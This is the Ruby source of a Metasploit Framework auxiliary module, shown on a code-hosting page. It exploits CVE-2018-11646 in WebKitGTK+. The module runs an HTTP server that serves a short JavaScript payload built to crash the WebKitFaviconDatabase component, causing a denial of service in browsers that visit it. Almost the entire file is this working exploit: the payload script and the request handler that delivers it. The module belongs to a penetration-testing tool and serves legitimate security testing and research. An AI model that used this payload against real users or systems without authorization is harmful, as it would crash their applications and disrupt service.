Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/webkitplus.rb
21552 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpServer

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'WebKitGTK+ WebKitFaviconDatabase DoS',

15
        'Description' => %q{

16
          This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.

17
          If successful, it could lead to application crash, resulting in denial of service.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Dhiraj Mishra', # Original discovery, disclosure

22
          'Hardik Mehta',  # Original discovery, disclosure

23
          'Zubin Devnani', # Original discovery, disclosure

24
          'Manuel Caballero' # JS Code

25
        ],

26
        'References' => [

27
          ['EDB', '44842'],

28
          ['CVE', '2018-11646'],

29
          ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],

30
          ['URL', 'https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html']

31
        ],

32
        'DisclosureDate' => '2018-06-03',

33
        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],

34
        'PassiveActions' => [ 'WebServer' ],

35
        'DefaultAction' => 'WebServer',

36
        'Notes' => {

37
          'Stability' => [CRASH_SERVICE_DOWN],

38
          'SideEffects' => [],

39
          'Reliability' => []

40
        }

41
      )

42
    )

43
  end

44


45
  def run

46
    exploit # start http server

47
  end

48


49
  def setup

50
    @html = <<~JS

51
      <script type="text/javascript">

52
       win = window.open("WIN", "WIN");

53
       window.open("http://example.com/", "WIN");

54
       win.document.execCommand('stop');

55
       win.document.write("HelloWorld");

56
       win.document.close();

57
      </script>

58
    JS

59
  end

60


61
  def on_request_uri(cli, _request)

62
    print_status('Sending response')

63
    send_response(cli, @html)

64
  end

65
end

66


67